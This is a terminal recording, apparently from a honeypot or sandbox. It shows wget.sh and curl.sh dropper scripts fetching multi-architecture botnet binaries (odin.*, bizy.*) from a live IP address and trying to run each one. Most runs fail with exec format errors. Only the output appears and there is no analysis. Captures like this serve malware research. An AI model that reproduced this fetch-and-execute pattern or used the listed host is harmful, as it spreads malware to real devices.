[65.260566, "o", "Saving to: ‘odin.mpsl’\r\n\r\n\rodin.mpsl      0%       0  --.-KB/s               "]
[65.52794, "o", "\rodin.mpsl     42%  70.23K   263KB/s               "]
[65.610382, "o", "\rodin.mpsl    100% 165.42K   473KB/s    in 0.3s    \r\n\r\n2025-10-27 06:29:53 (473 KB/s) - ‘odin.mpsl’ saved [169388/169388]\r\n\r\n"]
[65.614553, "o", "wget.sh: 17: ./odin.mpsl: Exec format error\r\n"]
[65.616523, "o", "--2025-10-27 06:29:53--  http://91.92.241.59/odin.ppc\r\nConnecting to 91.92.241.59:80... "]
[65.657628, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[65.801465, "o", "200 OK\r\nLength: 129716 (127K) [application/octet-stream]\r\nSaving to: ‘odin.ppc’\r\n\r\n\r"]
[65.801631, "o", "odin.ppc       0%       0  --.-KB/s               "]
[65.952626, "o", "\rodin.ppc     100% 126.68K   839KB/s    in 0.2s    \r\n\r\n2025-10-27 06:29:53 (839 KB/s) - ‘odin.ppc’ saved [129716/129716]\r\n\r\n"]
[65.955506, "o", "wget.sh: 18: ./odin.ppc: Exec format error\r\n"]
[65.957419, "o", "--2025-10-27 06:29:53--  http://91.92.241.59/odin.sh4\r\nConnecting to 91.92.241.59:80... "]
[66.138813, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[66.180952, "o", "200 OK\r\nLength: 113248 (111K) [application/octet-stream]\r\nSaving to: ‘odin.sh4’\r\n\r\n\rodin.sh4       0%       0  --.-KB/s               "]
[66.462654, "o", "\rodin.sh4     100% 110.59K   393KB/s               \rodin.sh4     100% 110.59K   393KB/s    in 0.3s    \r\n\r\n"]
[66.462721, "o", "2025-10-27 06:29:54 (393 KB/s) - ‘odin.sh4’ saved [113248/113248]\r\n\r\n"]
[66.467937, "o", "wget.sh: 19: ./odin.sh4: Exec format error\r\n"]
[66.47254, "o", "--2025-10-27 06:29:54--  http://91.92.241.59/odin.spc\r\nConnecting to 91.92.241.59:80... "]
[66.513868, "o", "connected.\r\n"]
[66.513928, "o", "HTTP request sent, awaiting response... "]
[66.555513, "o", "200 OK\r\nLength: 53988 (53K) [application/x-pkcs7-certificates]\r\n"]
[66.555686, "o", "Saving to: ‘odin.spc’\r\n\r\n\rodin.spc       0%       0  --.-KB/s               "]
[66.64678, "o", "\rodin.spc     100%  52.72K  --.-KB/s    in 0.09s   \r\n\r\n"]
[66.646974, "o", "2025-10-27 06:29:54 (580 KB/s) - ‘odin.spc’ saved [53988/53988]\r\n\r\n"]
[66.652823, "o", "wget.sh: 20: ./odin.spc: Exec format error\r\n"]
[66.6549, "o", "--2025-10-27 06:29:54--  http://91.92.241.59/odin.x64\r\nConnecting to 91.92.241.59:80... "]
[66.812543, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[66.854242, "o", "200 OK\r\nLength: 139160 (136K) [application/octet-stream]\r\n"]
[66.854313, "o", "Saving to: ‘odin.x64’\r\n\r\n\rodin.x64       0%       0  --.-KB/s               "]
[67.122913, "o", "\rodin.x64      74% 101.41K   378KB/s               "]
[67.140279, "o", "\rodin.x64     100% 135.90K   476KB/s    in 0.3s    \r\n\r\n2025-10-27 06:29:54 (476 KB/s) - ‘odin.x64’ saved [139160/139160]\r\n\r\n"]
[67.147545, "o", "--2025-10-27 06:29:54--  http://91.92.241.59/odin.x86\r\nConnecting to 91.92.241.59:80... "]
[67.188788, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[67.230294, "o", "200 OK\r\nLength: 84104 (82K) [application/octet-stream]\r\n"]
[67.230496, "o", "Saving to: ‘odin.x86’\r\n\r\n\rodin.x86       0%       0  --.-KB/s               "]
[67.56395, "o", "\rodin.x86      67%  55.33K   166KB/s               "]
[67.583935, "o", "\rodin.x86     100%  82.13K   232KB/s    in 0.4s    \r\n\r\n"]
[67.58398, "o", "2025-10-27 06:29:55 (232 KB/s) - ‘odin.x86’ saved [84104/84104]\r\n\r\n"]
[67.589454, "o", "--2025-10-27 06:29:55--  http://91.92.241.59/bizy.arm5\r\nConnecting to 91.92.241.59:80... "]
[67.630644, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[67.672651, "o", "200 OK\r\nLength: 1639216 (1.6M) [application/octet-stream]\r\n"]
[67.673046, "o", "Saving to: ‘bizy.arm5’\r\n\r\n\rbizy.arm5      0%       0  --.-KB/s               "]
[67.914676, "o", "\rbizy.arm5      3%  58.03K   240KB/s               "]
[68.218142, "o", "\rbizy.arm5     30% 491.78K   902KB/s               "]
[68.336915, "o", "\rbizy.arm5    100%   1.56M  2.35MB/s    in 0.7s    \r\n\r\n2025-10-27 06:29:56 (2.35 MB/s) - ‘bizy.arm5’ saved [1639216/1639216]\r\n\r\n"]
[68.340561, "o", "wget.sh: 24: ./bizy.arm5: Exec format error\r\n"]
[68.345291, "o", "--2025-10-27 06:29:56--  http://91.92.241.59/bizy.arm6\r\nConnecting to 91.92.241.59:80... "]
[68.386531, "o", "connected.\r\n"]
[68.386663, "o", "HTTP request sent, awaiting response... "]
[68.555362, "o", "200 OK\r\nLength: 1632424 (1.6M) [application/octet-stream]\r\n"]
[68.555566, "o", "Saving to: ‘bizy.arm6’\r\n\r\n\rbizy.arm6      0%       0  --.-KB/s               "]
[68.912506, "o", "\rbizy.arm6     15% 243.73K   683KB/s               "]
[69.100072, "o", "\rbizy.arm6    100%   1.56M  2.86MB/s    in 0.5s    \r\n\r\n"]
[69.10023, "o", "2025-10-27 06:29:56 (2.86 MB/s) - ‘bizy.arm6’ saved [1632424/1632424]\r\n\r\n"]
[69.103126, "o", "wget.sh: 25: ./bizy.arm6: Exec format error\r\n"]
[69.106127, "o", "--2025-10-27 06:29:56--  http://91.92.241.59/bizy.arm7\r\nConnecting to 91.92.241.59:80... "]
[69.274456, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[69.31778, "o", "200 OK\r\nLength: 1626952 (1.6M) [application/octet-stream]\r\n"]
[69.317955, "o", "Saving to: ‘bizy.arm7’\r\n"]
[69.318072, "o", "\r\n\rbizy.arm7      0%       0  --.-KB/s               "]
[69.613766, "o", "\rbizy.arm7      9% 154.27K   522KB/s               "]
[69.971628, "o", "\rbizy.arm7     18% 295.24K   452KB/s               "]
[70.234926, "o", "\rbizy.arm7     27% 436.21K   476KB/s               "]
[70.539264, "o", "\rbizy.arm7     34% 543.29K   445KB/s               "]
[70.741147, "o", "\rbizy.arm7     40% 646.31K   454KB/s               "]
[70.943025, "o", "\rbizy.arm7     55% 882.16K   543KB/s               "]
[71.246031, "o", "\rbizy.arm7     65%   1.02M   541KB/s               "]
[71.448037, "o", "\rbizy.arm7     77%   1.20M   578KB/s               "]
[71.597791, "o", "\rbizy.arm7    100%   1.55M   697KB/s    in 2.3s    \r\n\r\n"]
[71.597848, "o", "2025-10-27 06:29:59 (697 KB/s) - ‘bizy.arm7’ saved [1626952/1626952]\r\n\r\n"]
[71.601125, "o", "wget.sh: 26: ./bizy.arm7: Exec format error\r\n"]
[71.604129, "o", "--2025-10-27 06:29:59--  http://91.92.241.59/bizy.arm8\r\nConnecting to 91.92.241.59:80... "]
[71.645383, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[71.688595, "o", "200 OK\r\nLength: 1536596 (1.5M) [application/octet-stream]\r\n"]
[71.688804, "o", "Saving to: ‘bizy.arm8’\r\n\r\n\rbizy.arm8      0%       0  --.-KB/s               "]
[71.892637, "o", "\rbizy.arm8      2%  36.35K   178KB/s               "]
[72.245709, "o", "\rbizy.arm8      6%  98.70K   177KB/s               "]
[72.527477, "o", "\rbizy.arm8     14% 220.69K   263KB/s               "]
[72.850671, "o", "\rbizy.arm8     29% 437.57K   377KB/s               "]
[73.211863, "o", "\rbizy.arm8     52% 788.63K   518KB/s               "]
[73.635044, "o", "\rbizy.arm8     90%   1.32M   694KB/s               "]
[73.675467, "o", "\rbizy.arm8    100%   1.46M   755KB/s    in 2.0s    \r\n\r\n"]
[73.675531, "o", "2025-10-27 06:30:01 (755 KB/s) - ‘bizy.arm8’ saved [1536596/1536596]\r\n\r\n"]
[73.682047, "o", "wget.sh: 27: ./bizy.arm8: Exec format error\r\n"]
[73.686717, "o", "--2025-10-27 06:30:01--  http://91.92.241.59/bizy.mips\r\nConnecting to 91.92.241.59:80... "]
[73.727978, "o", "connected.\r\n"]
[73.728072, "o", "HTTP request sent, awaiting response... "]
[73.771682, "o", "200 OK\r\nLength: 1625968 (1.5M) [application/octet-stream]\r\n"]
[73.771937, "o", "Saving to: ‘bizy.mips’\r\n\r\n\rbizy.mips      0%       0  --.-KB/s               "]
[73.973982, "o", "\rbizy.mips      1%  29.57K   146KB/s               "]
[74.174118, "o", "\rbizy.mips     29% 472.81K  1.15MB/s               "]
[74.405314, "o", "\rbizy.mips     71%   1.10M  1.74MB/s               "]
[74.429683, "o", "\rbizy.mips    100%   1.55M  2.36MB/s    in 0.7s    \r\n\r\n"]
[74.430021, "o", "2025-10-27 06:30:02 (2.36 MB/s) - ‘bizy.mips’ saved [1625968/1625968]\r\n\r\n"]
[74.433329, "o", "wget.sh: 28: ./bizy.mips: Exec format error\r\n"]
[74.437958, "o", "--2025-10-27 06:30:02--  http://91.92.241.59/bizy.mpsl\r\nConnecting to 91.92.241.59:80... "]
[74.479095, "o", "connected.\r\n"]
[74.479188, "o", "HTTP request sent, awaiting response... "]
[74.520634, "o", "200 OK\r\nLength: 1618340 (1.5M) [application/octet-stream]\r\n"]
[74.520719, "o", "Saving to: ‘bizy.mpsl’\r\n\r\n\rbizy.mpsl      0%       0  --.-KB/s               "]
[74.732805, "o", "\rbizy.mpsl      4%  77.01K   364KB/s               "]
[75.089033, "o", "\rbizy.mpsl     31% 495.85K   873KB/s               "]
[75.212962, "o", "\rbizy.mpsl    100%   1.54M  2.23MB/s    in 0.7s    \r\n\r\n"]
[75.213442, "o", "2025-10-27 06:30:03 (2.23 MB/s) - ‘bizy.mpsl’ saved [1618340/1618340]\r\n\r\n"]
[75.217506, "o", "wget.sh: 29: ./bizy.mpsl: Exec format error\r\n"]
[75.222391, "o", "--2025-10-27 06:30:03--  http://91.92.241.59/bizy.mipss\r\nConnecting to 91.92.241.59:80... "]
[75.263538, "o", "connected.\r\n"]
[75.263844, "o", "HTTP request sent, awaiting response... "]
[75.45147, "o", "200 OK\r\nLength: 1631496 (1.6M) [application/octet-stream]\r\n"]
[75.451768, "o", "Saving to: ‘bizy.mipss’\r\n\r\n\rbizy.mipss     0%       0  --.-KB/s               "]
[75.79868, "o", "\rbizy.mipss    13% 217.98K   628KB/s               "]
[75.981089, "o", "\r"]
[75.981627, "o", "bizy.mipss   100%   1.56M  2.94MB/s    in 0.5s    \r\n\r\n2025-10-27 06:30:03 (2.94 MB/s) - ‘bizy.mipss’ saved [1631496/1631496]\r\n\r\n"]
[75.98641, "o", "wget.sh: 30: ./bizy.mipss: Exec format error\r\n"]
[75.991284, "o", "--2025-10-27 06:30:03--  http://91.92.241.59/bizy.mpsls\r\n"]
[75.991476, "o", "Connecting to 91.92.241.59:80... "]
[76.119934, "o", "connected.\r\n"]
[76.120356, "o", "HTTP request sent, awaiting response... "]
[76.161447, "o", "200 OK\r\n"]
[76.161502, "o", "Length: 1623604 (1.5M) [application/octet-stream]\r\n"]
[76.16164, "o", "Saving to: ‘bizy.mpsls’\r\n\r\n\rbizy.mpsls     0%       0  --.-KB/s               "]
[76.556908, "o", "\rbizy.mpsls     9% 152.92K   387KB/s               "]
[76.912882, "o", "\rbizy.mpsls    93%   1.45M  1.93MB/s               "]
[76.915011, "o", "\rbizy.mpsls   100%   1.55M  2.06MB/s    in 0.8s    \r\n\r\n"]
[76.91505, "o", "2025-10-27 06:30:04 (2.06 MB/s) - ‘bizy.mpsls’ saved [1623604/1623604]\r\n\r\n"]
[76.917989, "o", "wget.sh: 31: ./bizy.mpsls: Exec format error\r\n"]
[76.920895, "o", "--2025-10-27 06:30:04--  http://91.92.241.59/bizy.riscv\r\nConnecting to 91.92.241.59:80... "]
[76.962096, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[77.003782, "o", "200 OK\r\nLength: 3932344 (3.8M) [application/octet-stream]\r\n"]
[77.003846, "o", "Saving to: ‘bizy.riscv’\r\n\r\n"]
[77.003979, "o", "\rbizy.riscv     0%       0  --.-KB/s               "]
[77.204182, "o", "\rbizy.riscv     8% 311.51K  1.52MB/s               "]
[77.404551, "o", "\rbizy.riscv    14% 574.47K  1.40MB/s               "]
[77.697892, "o", "\rbizy.riscv    85%   3.19M  4.61MB/s               "]
[77.712423, "o", "\rbizy.riscv   100%   3.75M  5.29MB/s    in 0.7s    \r\n\r\n2025-10-27 06:30:05 (5.29 MB/s) - ‘bizy.riscv’ saved [3932344/3932344]\r\n\r\n"]
[77.716629, "o", "wget.sh: 32: ./bizy.riscv: Exec format error\r\n"]
[77.721989, "o", "--2025-10-27 06:30:05--  http://91.92.241.59/bizy.x86\r\nConnecting to 91.92.241.59:80... "]
[77.763335, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[77.80477, "o", "200 OK\r\nLength: 1645884 (1.6M) [application/octet-stream]\r\n"]
[77.804933, "o", "Saving to: ‘bizy.x86’\r\n\r\n\rbizy.x86       0%       0  --.-KB/s               "]
[78.051422, "o", "\rbizy.x86       3%  59.39K   241KB/s               "]
[78.402683, "o", "\rbizy.x86      40% 652.95K  1.07MB/s               "]
[78.506891, "o", "\rbizy.x86     100%   1.57M  2.24MB/s    in 0.7s    \r\n\r\n2025-10-27 06:30:06 (2.24 MB/s) - ‘bizy.x86’ saved [1645884/1645884]\r\n\r\n"]
[78.55317, "o", "Milk is good!\r\n"]
[78.599872, "o", "--2025-10-27 06:30:06--  http://91.92.241.59/bizy.x64\r\nConnecting to 91.92.241.59:80... "]
[78.72496, "o", "connected.\r\n"]
[78.72507, "o", "HTTP request sent, awaiting response... "]
[78.800232, "o", "200 OK\r\nLength: 1668100 (1.6M) [application/octet-stream]\r\nSaving to: ‘bizy.x64’\r\n\r\n\rbizy.x64       0%       0  --.-KB/s               "]
[79.096824, "o", "\rbizy.x64       6% 113.48K   381KB/s               "]
[79.29976, "o", "\rbizy.x64      18% 305.95K   611KB/s               "]
[79.500215, "o", "\rbizy.x64      42% 689.68K   984KB/s               "]
[79.662544, "o", "\rbizy.x64     100%   1.59M  1.84MB/s    in 0.9s    \r\n\r\n2025-10-27 06:30:07 (1.84 MB/s) - ‘bizy.x64’ saved [1668100/1668100]\r\n\r\n"]
[79.71717, "o", "Milk is good!\r\n"]
[79.802475, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Cu"]
[79.802688, "o", "rrent\r\n                                 Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[81.004934, "o", "\r  0     0    0     0    0     0      0      0 --:--:-"]
[81.005373, "o", "-  0:00:01 --:--:--     0"]
[82.006374, "o", "\r  0     0    0     0    0     0      0      0 --:--:--  0:00:02 --:--:--     0"]
[82.925497, "o", "\r  0     0    0     0    0     0      0      0 --:--:--  0:00:03 --:--:--     0"]
[83.064416, "o", "\r100  2795  100  2795    0     0    856      0  0:00:03  0:00:03 --:--:--   857\r\n"]
[83.069433, "o", "curl.sh: 3: ulimit: error setting limit (Operation not permitted)\r\n"]
[83.088555, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n        "]
[83.088608, "o", "                         Dload  U"]
[83.088781, "o", "pload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[83.487175, "o", "\r100  126k  100  126k    0     0   317k      0 --:--:-- --:--:-- --:--:--  317k\r\n"]
[83.493531, "o", "curl.sh: 10: ./odin.arm: Exec format error\r\n"]
[83.502489, "o", "  % Total    % Received % Xferd  Average S"]
[83.502559, "o", "peed   Time    Time     Time  Curr"]
[83.502764, "o", "ent\r\n                                 Dload  U"]
[83.502795, "o", "pload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- "]
[83.502921, "o", "--:--:-- --:--:--     0"]
[83.702969, "o", "\r 21  122k   21 27504    0     0   133k      0 --:--:-- --:--:-- --:--:--  133k"]
[83.882851, "o", "\r100  122k  100  122k    0     0   322k      0 --:--:-- --:--:-- --:--:--  321k\r\n"]
[83.888419, "o", "curl.sh: 11: ./odin.arm5: Exec format error\r\n"]
[83.894037, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n                                 Dload  U"]
[83.894249, "o", "pload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[84.16084, "o", "\r100 44912  100 44912    0     0   164k      0 --:--:-- --:--:-- --:--:--  164k\r\n"]
[84.16703, "o", "curl.sh: 12: ./odin.arm5n: Exec format error\r\n"]
[84.176598, "o", "  % Total    % Received % Xferd  Average Speed"]
[84.176664, "o", "   Time    Time     Time  Current\r\n  "]
[84.176683, "o", "          "]
[84.177166, "o", "                     Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      "]
[84.177331, "o", "0      0 --:--:-- --:--:-- --:--:--     0"]
[84.683464, "o", "\r 25  137k   25 35832    0     0  70677      0  0:00:01 --:--:--"]
[84.683547, "o", "  0:00:01 70674"]
[84.977962, "o", "\r100  137k  100  137k    0     0   172k      0 --:--:-- --:--:-- --:--:--  171k\r\n"]
[84.984622, "o", "curl.sh: 13: ./odin.arm6: Exec format error\r\n"]
[84.993569, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n                "]
[84.993925, "o", "                 Dload  Upload   Tota"]
[84.993987, "o", "l   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[85.597061, "o", "\r"]
[85.597936, "o", "100  171k  100  171k    0     0   284k      0 --:--:-- --:--:-- --:--:--  285k\r\n"]
[85.601981, "o", "curl.sh: 14: ./odin.arm7: Exec format error\r\n"]
[85.607792, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     "]
[85.607873, "o", "Time  Current\r\n                                 Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0  "]
[85.607908, "o", "  0     0      0      0 --:"]
[85.607936, "o", "--:-- --"]
[85.607975, "o", ":--:-- -"]
[85.608176, "o", "-:--:--    "]
[85.608328, "o", " 0"]
[85.774244, "o", "\r  4  141k    4  6684    0     0  40120      0  0:00:03 --:--:--  0:00:03 40023"]
[85.937381, "o", "\r100  141k  100  141k    0     0   427k      0 -"]
[85.937444, "o", "-:--:-- --:--:-- --:--:--  427"]
[85.937702, "o", "k\r\n"]
[85.94135, "o", "curl.sh: 15: ./odin.m68k: Exec format error\r\n"]
[85.946299, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n   "]
[85.946352, "o", "                              Dload  Upload   Total   Sp"]
[85.946389, "o", "ent    Left  Speed\r\n\r  0     0    0"]
[85.946429, "o", "     0    0     0      0   "]
[85.946472, "o", "   0 --:--:-- --:--:-- -"]
[85.946652, "o", "-:--:--     0"]
[86.500325, "o", "\r100  165k  100  165k    0     0   298k      0 --:--:-- --:--:-- --:--:--  299k\r\n"]
[86.504071, "o", "curl.sh: 16: ./odin.mips: Exec format error\r\n"]
[86.509279, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Ti"]
[86.509511, "o", "me  Current\r\n                                 Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[86.68168, "o", "\r 31  165k   31 53876    0     0   305k      0 --:--:-- --:--:-- --:--:--  304k"]
[86.754051, "o", "\r100  165k  100  165k    0     0   675k      0 --:--:-- --:--:-- --:--:--  675k\r\n"]
[86.757919, "o", "curl.sh: 17: ./odin.mpsl: Exec format error\r\n"]
[86.763181, "o", "  % Total    % Received % Xferd  Average S"]
[86.763212, "o", "peed   Time    Time     T"]
[86.763476, "o", "ime  Current\r\n"]
[86.763514, "o", "                                 Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[88.105105, "o", "\r 89  126k   89  113k    0     0  86692      0  0:00:01  0:00:01 --:--:-- 86753"]
[88.157018, "o", "\r100  126k  100  126k    0     0  93064      0  0:00:01  0:00:01 --:--:-- 93119\r\n"]
[88.160826, "o", "curl.sh: 18: ./odin.ppc: Exec format error\r\n"]
[88.166655, "o", "  % Total    % Received % Xferd  Average Speed   "]
[88.166689, "o", "T"]
[88.16684, "o", "ime    Time     Time  Current\r\n                   "]
[88.166957, "o", "              Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[88.66467, "o", "\r100  110k  100  110k    0     0   222k      0 --:--:-- --:--:-- --:--:--  222k\r\n"]
[88.67002, "o", "curl.sh: 19: ./odin.sh4: Exec format error\r\n"]
[88.679689, "o", "  % Total    % Received % Xferd  Average Speed   Time  "]
[88.679874, "o", "  Time    "]
[88.679919, "o", " Time  Current"]
[88.680129, "o", "\r\n                                 Dload  Upload   Total   Spen"]
[88.680154, "o", "t    Left  "]
[88.680167, "o", "Spee"]
[88.680183, "o", "d\r\n"]
[88.680799, "o", "\r  0     0    0     0    0     0      0      0"]
[88.680943, "o", " --:--:-- --:--:-- --:--:--     0"]
[88.720719, "o", "\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--   "]
[88.720795, "o", "  0"]
[88.856418, "o", "\r100 53988  100 53988    0     0   297k      0 --:--:-- --:--:-- --:--:--  297k\r\n"]
[88.86256, "o", "curl.sh: 20: ./odin.spc: Exec format error\r\n"]
[88.871595, "o", "  % Total    % Received % Xfer"]
[88.871633, "o", "d  Avera"]
[88.871658, "o", "ge Speed  "]
[88.871829, "o", " Time    Time     Time  Current\r\n                                 Dload  Up"]
[88.871861, "o", "load   Total   "]
[88.871878, "o", "Spent    Left  "]
[88.871942, "o", "Speed\r\n\r  0     0    0    "]
[88.87211, "o", " 0    0     0      0      0 --:--:"]
[88.872232, "o", "-- --:--:-- --:--:--     0"]
[89.232221, "o", "\r100  135k  100  135k    0     0   376k      0 --:--:-- --:--:"]
[89.23242, "o", "-- --:--:--  377k\r\n"]
[89.244633, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time"]
[89.244705, "o", "     Time  Current\r\n                         "]
[89.2452, "o", "        Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[89.594129, "o", "\r100 84104  100 84104    0     0   234k      0 --:--:-- --:--:"]
[89.594328, "o", "-- --:--:--  235k\r\n"]
[89.602676, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n                                 Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0  "]
[89.602859, "o", "   0      0      0 --:--:-- --:--:-- --:--:--     0"]
[89.737539, "o", "\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[90.884139, "o", "\r 35 1600k   35  573k    0     0   447k      0  0:00:03  0:00:01  0:00:02  447k"]
[90.998986, "o", "\r100 1600k  100 1600k    0     0  1146k      0  0:00:01  0:00:01 --:--:-- 1145k\r\n"]
[91.003704, "o", "curl.sh: 25: ./bizy.arm5: Exec format error\r\n"]
[91.010555, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n                               "]
[91.01062, "o", "  Dload  Upload   T"]
[91.010661, "o", "otal   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[91.681349, "o", "\r 56 1594k   56  899k    0     0  1341k      0  0:00:01 --:--:--  0:00:01 1340k"]
[91.724191, "o", "\r100 1594k  100 1594k    0     0  2233k      0 --:--:-- --:--:-"]
[91.724243, "o", "- --:--:-- 2232k\r\n"]
[91.729359, "o", "curl.sh: 26: ./bizy.arm6: Exec format error\r\n"]
[91.739621, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n  "]
[91.73967, "o", "                               Dload  Upload   To"]
[91.739899, "o", "tal   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[92.609311, "o", "\r100 1588k  100 1588k    0     0  1826k      0 --:--:-- --:--:-- --:--:-- 1828k\r\n"]
[92.615828, "o", "curl.sh: 27: ./bizy.arm7: Exec format error\r\n"]
[92.626581, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  C"]
[92.627116, "o", "urrent\r\n                                 Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[92.709413, "o", "\r  0 1500k    0  8071    0     0  97255      0  0:00:15 --:--:--  0:00:15 97240"]
[93.388073, "o", "\r100 1500k  100 1500k    0     0  1970k      0 --:--:-- --:--:-- "]
[93.388205, "o", "--:--:-- 1969k\r\n"]
[93.394081, "o", "curl.sh: 28: ./bizy.arm8: Exec format error\r\n"]
[93.40259, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n                 "]
[93.402771, "o", "                Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[93.763141, "o", "\r  6 1587k    6 98291    0     0   266k      0  0:00:05 --:--:--  0:00:05  265k"]
[94.200166, "o", "\r100 1587k  100 1587k    0     0  1990k      0 --:--:-- "]
[94.20032, "o", "--:--:-- --:--:-- 1989k\r\n"]
[94.206356, "o", "curl.sh: 29: ./bizy.mips: Exec format error\r\n"]
[94.215177, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time"]
[94.215279, "o", "  Current\r\n                                 Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0  "]
[94.215307, "o", "  0     0      0      0 --:--:-- --:--:-- --:--:-- "]
[94.215432, "o", "    0"]
[94.789595, "o", "\r 20 1580k   20  319k    0     0   556k      0  0:00:02 --:--:--  0:00:02  555"]
[94.789645, "o", "k"]
[94.941438, "o", "\r100 1580k  100 1580k    0     0  2175k      0 --:--:-- --:--:-- --:--:-- 2173k\r\n"]
[94.946715, "o", "curl.sh: 30: ./bizy.mpsl: Exec format error\r\n"]
[94.954656, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n              "]
[94.95469, "o", "                   "]
[94.954704, "o", "Dlo"]
[94.954928, "o", "ad  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[95.713382, "o", "\r  9 1593k    9  152k    0     0   201k      0  0:00:07 --:--:--  0:00:07  201k"]
[96.746034, "o", "\r 15 1593k   15  253k    0     0   141k      0  0:00:11  0:00:01  0:00:10  141k"]
[97.681981, "o", "\r 32 1593k   32  514k    0     0   188k      0  0:00:08  0:00:02  0:00:06  188k"]
[98.681272, "o", "\r 73 1593k   73 1168k    0     0   313k      0  0:00:05  0:00:03  0:00:02  313k"]
[98.97234, "o", "\r100 1593k  100 1593k    0     0   396k      0  0:00:04  0:00:04 --:--:--  396k\r\n"]
[98.977803, "o", "curl.sh: 31: ./bizy.mipss: Exec format error\r\n"]
[98.98652, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n      "]
[98.986581, "o", "                           Dload  Upl"]
[98.986604, "o", "oad   Total   Spent    Left  Spe"]
[98.986622, "o", "ed\r\n\r  0     0"]
[98.986634, "o", " "]
[98.986833, "o", "   0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[99.68418, "o", "\r 28 1585k   28  451k    0     0   646k      0  0:00:02 --:--:--  0:00:02  646k"]
[99.813236, "o", "\r100 1585k  100 1585k    0     0  1917k      0 --:--:-- --:--:-- --:--:-- 1917k\r\n"]
[99.816977, "o", "curl.sh: 32: ./bizy.mpsls: Exec format error\r\n"]
[99.822995, "o", "  % Total    % Received % Xferd  Average Speed   Time    Tim"]
[99.823051, "o", "e     Time  Current\r\n      "]
[99.823065, "o", "        "]
[99.823074, "o", "      "]
[99.823087, "o", "     "]
[99.823103, "o", "        "]
[99.823112, "o", "Dload  "]
[99.823296, "o", "Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[100.543996, "o", "\r100 3840k  100 3840k    0     0  5326k      0 --:--:-- --:--:-- --:--:-- 5333k\r\n"]
[100.549499, "o", "curl.sh: 33: ./bizy.riscv: Exec format error\r\n"]
[100.559907, "o", "  % Total    % Received % Xferd  Average Speed"]
[100.559944, "o", "   Time    Time     Time  Cur"]
[100.559955, "o", "rent\r\n      "]
[100.560097, "o", "                           Dload  Upload  "]
[100.560206, "o", " Total   Spent    L"]
[100.56025, "o", "eft  Speed\r\n\r  0  "]
[100.560259, "o", "   0 "]
[100.560274, "o", "   0     0"]
[100.560287, "o", "    0  "]
[100.560453, "o", "   0      0      0 --:--:-- --:--:-- --:"]
[100.56047, "o", "--:--     0"]
[100.760447, "o", "\r  0     0    0     0    0     0      0      0 --:--:-- --:--:--"]
[100.760504, "o", " --:--:--     0"]
[101.322834, "o", "\r100 1607k  100 1607k    0     0  2106k      0 --:--:-- --:--:-- --:--:-- 2106k\r\n"]
[101.397199, "o", "sh: 1: Milk: not found\r\n"]
[101.408354, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time"]
[101.408402, "o", "  Current\r\n             "]
[101.408682, "o", "                    Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
